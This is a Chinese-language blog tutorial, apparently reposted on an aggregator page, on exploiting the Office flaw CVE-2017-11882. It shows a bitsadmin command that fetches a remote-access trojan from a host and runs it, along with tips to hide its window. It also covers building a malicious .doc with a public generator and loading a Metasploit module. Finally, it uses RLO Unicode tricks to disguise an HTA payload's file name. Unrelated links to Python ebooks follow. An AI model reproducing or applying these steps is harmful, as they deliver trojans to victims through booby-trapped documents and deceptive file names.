CVE-2017-11882利用大全

2017 年 11 月 30 日 黑白之道 一把附魔钻石剑


大家好,我是Alex。今天教大家有效利用OFFICE这个漏洞!首先使用HTA脚本远程下载和执行远控马~


新建一个HTA脚本


bitsadmin /transfer officehttp://192.168.1.19:81/office.exe c:\office.exe & c:\office.exe



PS:加入/setpriority来提高任务的优先级(加速),加入vbhide来隐藏下图那恼人的窗口



上传到web目录或者使用其他工具建立下载链接




别忘了咱们的木马



最后使用Command_CVE-2017-11882来生成doc文档



我这里使用win7office 2013测试



!!!!



类似这种cmd中下载执行的命令还有很多!大家自行百度吧~



除此之外,还可以使用kali自动生成监听


https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb


将脚本下载并挪到/usr/share/metasploit-


framework/modules/exploits/windows/fileformat目录下,启动msf



将生成的doc还是在靶机测试一下


!!!


PS

大家是否还记得BD2.NetInjector By BD2这个工具



可以生成图片马,意思就是可以绑定exe文件!如此一想那么咱们的hta也可以使用Unicode控制符转换为exe文件,哈哈哈哈哈…咳咳咳……



我们还是用刚才的HTA脚本演示,给它改名



然后把光标落在ae之间,使用RLO转换





…exe…我们执行一下



Nice!掰掰·~

你会喜欢


CVE-2017-11882利用

微软Office曝存在17年之久的“全版本影响”老洞


登录查看更多
0

相关内容

一份简明有趣的Python学习教程,42页pdf
专知会员服务
76+阅读 · 2020年6月22日
【实用书】Python技术手册,第三版767页pdf
专知会员服务
235+阅读 · 2020年5月21日
干净的数据:数据清洗入门与实践,204页pdf
专知会员服务
161+阅读 · 2020年5月14日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
【电子书】Flutter实战305页PDF免费下载
专知会员服务
22+阅读 · 2019年11月7日
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
3 行代码 5 秒抠图的 AI 神器,根本无需 PS
大数据技术
20+阅读 · 2019年7月24日
医学图像处理与深度学习入门
人工智能前沿讲习班
17+阅读 · 2019年6月6日
Python用于NLP :处理文本和PDF文件
Python程序员
4+阅读 · 2019年3月27日
GitHub 热门:各大网站的 Python 爬虫登录汇总
机器学习算法与Python学习
9+阅读 · 2019年3月20日
干货 | Python 爬虫的工具列表大全
机器学习算法与Python学习
10+阅读 · 2018年4月13日
Neo4j 和图数据库起步
Linux中国
8+阅读 · 2017年12月20日
Python3爬虫之入门和正则表达式
全球人工智能
7+阅读 · 2017年10月9日
Python NLP 入门教程
开源中国
14+阅读 · 2017年10月1日
Arxiv
7+阅读 · 2018年12月26日
Arxiv
11+阅读 · 2018年4月25日
Arxiv
3+阅读 · 2018年4月5日
Arxiv
5+阅读 · 2018年3月6日
VIP会员
相关VIP内容
一份简明有趣的Python学习教程,42页pdf
专知会员服务
76+阅读 · 2020年6月22日
【实用书】Python技术手册,第三版767页pdf
专知会员服务
235+阅读 · 2020年5月21日
干净的数据:数据清洗入门与实践,204页pdf
专知会员服务
161+阅读 · 2020年5月14日
【实用书】Python爬虫Web抓取数据,第二版,306页pdf
专知会员服务
117+阅读 · 2020年5月10日
【电子书】C++ Primer Plus 第6版,附PDF
专知会员服务
87+阅读 · 2019年11月25日
【电子书】Flutter实战305页PDF免费下载
专知会员服务
22+阅读 · 2019年11月7日
相关资讯
用 Python 开发 Excel 宏脚本的神器
私募工场
26+阅读 · 2019年9月8日
3 行代码 5 秒抠图的 AI 神器,根本无需 PS
大数据技术
20+阅读 · 2019年7月24日
医学图像处理与深度学习入门
人工智能前沿讲习班
17+阅读 · 2019年6月6日
Python用于NLP :处理文本和PDF文件
Python程序员
4+阅读 · 2019年3月27日
GitHub 热门:各大网站的 Python 爬虫登录汇总
机器学习算法与Python学习
9+阅读 · 2019年3月20日
干货 | Python 爬虫的工具列表大全
机器学习算法与Python学习
10+阅读 · 2018年4月13日
Neo4j 和图数据库起步
Linux中国
8+阅读 · 2017年12月20日
Python3爬虫之入门和正则表达式
全球人工智能
7+阅读 · 2017年10月9日
Python NLP 入门教程
开源中国
14+阅读 · 2017年10月1日
Top
微信扫码咨询专知VIP会员